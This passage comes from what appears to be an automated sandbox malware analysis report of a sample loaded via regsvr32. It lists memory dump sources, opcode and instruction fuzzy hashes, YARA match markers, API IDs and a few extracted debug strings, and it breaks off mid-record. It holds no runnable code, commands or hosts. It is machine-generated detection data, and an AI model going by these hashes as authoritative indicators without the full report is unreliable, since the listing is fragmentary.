                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                            • Opcode ID: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                                                                                                                            • Instruction ID: 4100ce572620d1c1a88d355e59e42e70646b8bdb19455ed0dacdec880efd80b2
                                                                                                                                            • Opcode Fuzzy Hash: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                                                                                                                            • Instruction Fuzzy Hash: 9541BE3650CBC5DAE6708F24E8443ABB3A1FB88755F500629D68D42BA8EF3ED095CF40
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #X$!Iv;$=`$M@$of?$uzxY
                                                                                                                                            • API String ID: 0-1910763920
                                                                                                                                            • Opcode ID: 9693a8ffcd6589fd3dbfdbad085aa322119c3f1a6317bc180f44839f00dc24fe
                                                                                                                                            • Instruction ID: 7899ed511868268ad7aea3719dccceda62fd29fa6bb16e154aa46d1db7c43d79
                                                                                                                                            • Opcode Fuzzy Hash: 9693a8ffcd6589fd3dbfdbad085aa322119c3f1a6317bc180f44839f00dc24fe
                                                                                                                                            • Instruction Fuzzy Hash: F172047190478C8BDB58DF68C88A69E7FE1FB84384F20461DF95A9B260D770D989CF81
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #X$*I$;*v($;3$F9p$ef~j
                                                                                                                                            • API String ID: 0-950528966
                                                                                                                                            • Opcode ID: 9500c32e6f155eacac3cfe5a03c267215382f5440a46099a8d521f2441a56deb
                                                                                                                                            • Instruction ID: 5057aee1002f2822c724537f3f36740fe0594223e2d956511feddf479ded4ebe
                                                                                                                                            • Opcode Fuzzy Hash: 9500c32e6f155eacac3cfe5a03c267215382f5440a46099a8d521f2441a56deb
                                                                                                                                            • Instruction Fuzzy Hash: 6A42E771144BCA8BCBB9CF24CC85BEF7BA0FB44306F145529D89A8A291DBB89745CF41
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: %$9w$IX$M?@$jS<$M
                                                                                                                                            • API String ID: 0-1157581923
                                                                                                                                            • Opcode ID: 4886396801a5b693aefa3fa65be42d7051c7ccebe6a69933f9c891aa2fa5d29c
                                                                                                                                            • Instruction ID: e375d1c8451a89c96fc0dfbd01d6dda6b37f4c7765b0f9ce143112ad2eac9b8a
                                                                                                                                            • Opcode Fuzzy Hash: 4886396801a5b693aefa3fa65be42d7051c7ccebe6a69933f9c891aa2fa5d29c
                                                                                                                                            • Instruction Fuzzy Hash: 8A32E4B0A147888BCBB8CF68C8897DD7BF0FB48318F90521DEA0A9B251DB745645CF59
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: %$&n$1U$Oh$j/$X
                                                                                                                                            • API String ID: 0-3716166881
                                                                                                                                            • Opcode ID: 3ec52770ba243505623e348b6c36d4d02d94aade20e82fe7112f5902b3326bac
                                                                                                                                            • Instruction ID: b98437ffb223a44b0e92d10549c73aaa59fdecde54cd589da16d290276777c9c
                                                                                                                                            • Opcode Fuzzy Hash: 3ec52770ba243505623e348b6c36d4d02d94aade20e82fe7112f5902b3326bac
                                                                                                                                            • Instruction Fuzzy Hash: D9F13C70508B88CFD7B9CF24D48969EBBF4FB84744F204A1EE5A59B260DBB09645CF42
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: G8L$J9$ozq~$ss6$tiG$P;
                                                                                                                                            • API String ID: 0-1765782432
                                                                                                                                            • Opcode ID: c77c4daeda8c59326f72f8188263c488bfcd846ed7a7bd487d849044a826f1d5
                                                                                                                                            • Instruction ID: 77e5b6b93cc6977e5a95292e040e55b4553736c218ba0195107264470a30d31c
                                                                                                                                            • Opcode Fuzzy Hash: c77c4daeda8c59326f72f8188263c488bfcd846ed7a7bd487d849044a826f1d5
                                                                                                                                            • Instruction Fuzzy Hash: FCC1097050064D8FDF89DF28C89A6DE3BA1FB68398F51421DFC4A962A1C778D994CBC4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                            • Opcode ID: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                                                                                                                            • Instruction ID: 231de6e5675552369f5bf0323dfcd87f31eb7779cb213d8cf69b616c413fcbe9
                                                                                                                                            • Opcode Fuzzy Hash: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                                                                                                                            • Instruction Fuzzy Hash: 8F21FD2160DF09C5EA74CB15F85022977E0EB8DBA4F141635EA9D837A4EE3CD294C710
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ,bF$-Ie:$Y$jc$_
                                                                                                                                            • API String ID: 0-2562869522
                                                                                                                                            • Opcode ID: 13dcfdf2b547f47b8e652e45a129a81bd12d479633329dbfd5d4c9c90b2a7465
                                                                                                                                            • Instruction ID: be835d82a8a11271eaf2d0d4144821f845ce411821323c63ff6fa91e08a90877
                                                                                                                                            • Opcode Fuzzy Hash: 13dcfdf2b547f47b8e652e45a129a81bd12d479633329dbfd5d4c9c90b2a7465
                                                                                                                                            • Instruction Fuzzy Hash: 2F82FC7190478C8BDBBDCF24C8466DE7BE1FB88744F104A1DEA5A8A350D7B49785CB82
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: %$3'p$AVx.$R@\$|7}
                                                                                                                                            • API String ID: 0-1377184578
                                                                                                                                            • Opcode ID: 42416e948d3c9d06b93ab1f3a8ba6bb7b4031ce7609dd7b48ddc645cdcf3989a
                                                                                                                                            • Instruction ID: 11bdd15b6fdebef4e4e33012fe2102d5287f0ed75640ad066b8b9400528ec4a7
                                                                                                                                            • Opcode Fuzzy Hash: 42416e948d3c9d06b93ab1f3a8ba6bb7b4031ce7609dd7b48ddc645cdcf3989a
                                                                                                                                            • Instruction Fuzzy Hash: F0820774604BC88BDBB8DF24DC857CD7BE0FB86305F20561DD95E9AA60CBB89645CB02
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .s$/$*$89$W0$j~L
                                                                                                                                            • API String ID: 0-3680180293
                                                                                                                                            • Opcode ID: b1eb1fe3fa88397c885ab509abe1c858ffcdb74bf15ef161dec0971567ed18e8
                                                                                                                                            • Instruction ID: f5b8073de7550f00aae71ce47ac4d0d330c984d331b26572373d31fffc6277f7
                                                                                                                                            • Opcode Fuzzy Hash: b1eb1fe3fa88397c885ab509abe1c858ffcdb74bf15ef161dec0971567ed18e8
                                                                                                                                            • Instruction Fuzzy Hash: 9332237050C7848FC369DF68C58A65EBBF0FB8A744F004A1EF68687260D7B6D949CB42
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: :_$DHM$J? $ioF$IE
                                                                                                                                            • API String ID: 0-1950181368
                                                                                                                                            • Opcode ID: 259697ebe02e240ff157c8cb6796f3c563015099138ecee0effd1804923e127d
                                                                                                                                            • Instruction ID: dfce06ae3f2776b2053eb0988bfb390665c026a97965fcc171ceda4eb787facd
                                                                                                                                            • Opcode Fuzzy Hash: 259697ebe02e240ff157c8cb6796f3c563015099138ecee0effd1804923e127d
                                                                                                                                            • Instruction Fuzzy Hash: 4E02F470A0470DEFDB99DF68C089A8EBBF1FB48344F40856AE809EB250D7749A59CB45
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: \=V$h9&$n"$wPT$5Z3
                                                                                                                                            • API String ID: 0-226182706
                                                                                                                                            • Opcode ID: ce1cfba10c1d8d8dcb7fefef68f5dbb71196a1667c8063e3a43dba33cd0a9cce
                                                                                                                                            • Instruction ID: 86bcb4527d36acdb60297ed143c12856cad003a08b6179b63c097fe4f6929213
                                                                                                                                            • Opcode Fuzzy Hash: ce1cfba10c1d8d8dcb7fefef68f5dbb71196a1667c8063e3a43dba33cd0a9cce
                                                                                                                                            • Instruction Fuzzy Hash: F7E11871A0468C8BDF59CFE8C48ABDDBBF2FB54348F004129D906BB298D774951ACB85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 2k$5.A$h$Tv$|
                                                                                                                                            • API String ID: 0-899094025
                                                                                                                                            • Opcode ID: db2f60ac8ea9c811a7e8a42be398396c7662d8ce257af2786f0ca87739e0812c
                                                                                                                                            • Instruction ID: fdc8e1fcc57a9d708ca924da4610569f3fbcb91b13fa75a00635c4e08a114872
                                                                                                                                            • Opcode Fuzzy Hash: db2f60ac8ea9c811a7e8a42be398396c7662d8ce257af2786f0ca87739e0812c
                                                                                                                                            • Instruction Fuzzy Hash: 2CE1B2B190474C8FDB69CFA8C48969DBFF1FB48348F20421DE869AB262D7749945CF41
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateProcess
                                                                                                                                            • String ID: `H$h$T$TaK$_
                                                                                                                                            • API String ID: 963392458-2145750592
                                                                                                                                            • Opcode ID: ffc2d6b317b26a71c8140759e67952dd965db1d69b0c3f8b48f7c1dc501504e9
                                                                                                                                            • Instruction ID: 3659a6701c3bc18b063cae63192a65d6a0dab5b7a081606fb1710f1fc1c5873b
                                                                                                                                            • Opcode Fuzzy Hash: ffc2d6b317b26a71c8140759e67952dd965db1d69b0c3f8b48f7c1dc501504e9
                                                                                                                                            • Instruction Fuzzy Hash: 8FA10771D087188FDB68DFA9D8856CDBBF1FB48308F20421DE45AA7252DB70A945CF41
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Bwu$L>yL${NC$^K
                                                                                                                                            • API String ID: 0-3175627499
                                                                                                                                            • Opcode ID: 50b0aea139128d6f7c402ec74795df524ca4165021b819f0d064fd60e31d3d12
                                                                                                                                            • Instruction ID: fbf4dbbb098cc7df43bbc7889590cb4d1f5602d02220e4776b40022e4a41187c
                                                                                                                                            • Opcode Fuzzy Hash: 50b0aea139128d6f7c402ec74795df524ca4165021b819f0d064fd60e31d3d12
                                                                                                                                            • Instruction Fuzzy Hash: 13322B70908B488FE769CF78C48665EBBF0FB84748F204A1DE6A697270DB749945CF42
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: %$N'}$Od^v$dS
                                                                                                                                            • API String ID: 0-4183360357
                                                                                                                                            • Opcode ID: 3e0f3c17ca57f4ad1f3f1084ac04447848ab7be5cba89c2bccd8803fee9248a0
                                                                                                                                            • Instruction ID: 281f3f4e81126c35bb2be7146c604e5ee0be10d432db17f45780181539d507de
                                                                                                                                            • Opcode Fuzzy Hash: 3e0f3c17ca57f4ad1f3f1084ac04447848ab7be5cba89c2bccd8803fee9248a0
                                                                                                                                            • Instruction Fuzzy Hash: 3342D9B190438C8BDBB8CF64C8896DD7BF1FB48318F50852DDA199B251DBB05685CF98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: +Gq$__Z%$|deb$sH
                                                                                                                                            • API String ID: 0-2072550713
                                                                                                                                            • Opcode ID: 094eb7f958d011cdb8ce81038bafb84045d4698861e966cd2ff6582630ea1e3f
                                                                                                                                            • Instruction ID: 26b4cb1fb47336c1432c1659c452027cf20818b998f95a2bcb6bb32f36742f2f
                                                                                                                                            • Opcode Fuzzy Hash: 094eb7f958d011cdb8ce81038bafb84045d4698861e966cd2ff6582630ea1e3f
                                                                                                                                            • Instruction Fuzzy Hash: 0FD1137160270DCBDB68DF28C68A6DE3BE1FF48308F504129FC5A96262D774D929CB49
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 5P$8r$:=$xX
                                                                                                                                            • API String ID: 0-2901174047
                                                                                                                                            • Opcode ID: 6865726b2104b4eb7ff299f8486c8d696ddfefbd7c25c2068e726a6c762a58db
                                                                                                                                            • Instruction ID: 9c4e4b6ab2cee8fe4f9bfbf45665c48137a45671121b1b9ae43ff9fbf3dba1fc
                                                                                                                                            • Opcode Fuzzy Hash: 6865726b2104b4eb7ff299f8486c8d696ddfefbd7c25c2068e726a6c762a58db
                                                                                                                                            • Instruction Fuzzy Hash: 35E1357191034D9BCB88DF64C8899DD7BF1FB48398F516219FC4AAB260C7789585CF88
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: &$Ro$X|$WW
                                                                                                                                            • API String ID: 0-419055892
                                                                                                                                            • Opcode ID: ca40c88e9c0bb890938dc8e49850b9c6f80446ec0944c9f0783c0d192955d258
                                                                                                                                            • Instruction ID: 8aa2c3e6b8818245adabd520600babaa531b4d52059a868131a34f3b668756e0
                                                                                                                                            • Opcode Fuzzy Hash: ca40c88e9c0bb890938dc8e49850b9c6f80446ec0944c9f0783c0d192955d258
                                                                                                                                            • Instruction Fuzzy Hash: 1EC1FDB150570DCBDB68CF28C58A6DE3BE5FB48308F108129FC5A9B2A0D774EA59CB45
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: tR$tR$uxX4$6)
                                                                                                                                            • API String ID: 0-566208085
                                                                                                                                            • Opcode ID: c081e77f49af2eaf56923f63e50e632cb9bf55942161f3f8d2179c3bd288189e
                                                                                                                                            • Instruction ID: 21dbc208fb27f88b672f000d339ef1a4b78a4386f06e48fd8b1f03ba1e8317ad
                                                                                                                                            • Opcode Fuzzy Hash: c081e77f49af2eaf56923f63e50e632cb9bf55942161f3f8d2179c3bd288189e
                                                                                                                                            • Instruction Fuzzy Hash: 84D1E5705087CC8BDBFEDF68C8857DA7BA8FB44748F104219EA0A9E269CB745749CB41
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 57$7|$K-~$`by
                                                                                                                                            • API String ID: 0-1764728439
                                                                                                                                            • Opcode ID: 3d75101ad2ff9bc1d340fad9c74c74685bf15c99ef7bfcf0826df8ee18983ab7
                                                                                                                                            • Instruction ID: 0ef0f182f1da72c174031fc5be9a225670cb57be642fb1d84f9edf9d7426cf45
                                                                                                                                            • Opcode Fuzzy Hash: 3d75101ad2ff9bc1d340fad9c74c74685bf15c99ef7bfcf0826df8ee18983ab7
                                                                                                                                            • Instruction Fuzzy Hash: 5EC1227510160CCBDBA8DF38C48A6DD3BE1FF58308F605129FC2A9A266C7B4D959CB44
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #X$"*$DgQ$6i
                                                                                                                                            • API String ID: 0-2770996495
                                                                                                                                            • Opcode ID: 820f3a7f2831d7bc6be119a51f5435b60720529f940ec106d6c272ece28fcda8
                                                                                                                                            • Instruction ID: 504b32a01a029d54a9cc7c4b79b1c57dce6396aa3b2efbc72770fc67d95dc726
                                                                                                                                            • Opcode Fuzzy Hash: 820f3a7f2831d7bc6be119a51f5435b60720529f940ec106d6c272ece28fcda8
                                                                                                                                            • Instruction Fuzzy Hash: CCB10871A0870CABDFA9DFA8E4896DDBBF1FB44344F00451DE446A7290DB749A0ECB85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: O:M$iJ"]$p$p
                                                                                                                                            • API String ID: 0-2745201584
                                                                                                                                            • Opcode ID: c580725723075c93842e669fadfa9b9fa9ca71e2e3fa7497301af4adcf51def7
                                                                                                                                            • Instruction ID: 8b688321e04c0e646b0fc78ee6d67cd940f90a9f6723fb1f8222d7259e9641f4
                                                                                                                                            • Opcode Fuzzy Hash: c580725723075c93842e669fadfa9b9fa9ca71e2e3fa7497301af4adcf51def7
                                                                                                                                            • Instruction Fuzzy Hash: 8AB10070D143098BCB89DFA8D486AEEBBF0FB48304F14851EE856B7250D7749A44CFA9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 00007FFC65CF60C7
                                                                                                                                            • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FFC65CF5FE7
                                                                                                                                            • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 00007FFC65CF617C
                                                                                                                                            • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FFC65CF5EF9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
                                                                                                                                            • API String ID: 0-1867057952
                                                                                                                                            • Opcode ID: 2a9d8457aa34911385b660402f71547a5181f90184c5f28ce50b42f7ee7f8c58
                                                                                                                                            • Instruction ID: 704ed9816b26f6e3ec5967457f0d2aa97875ddc8e8530dd76e8e336537c088b7
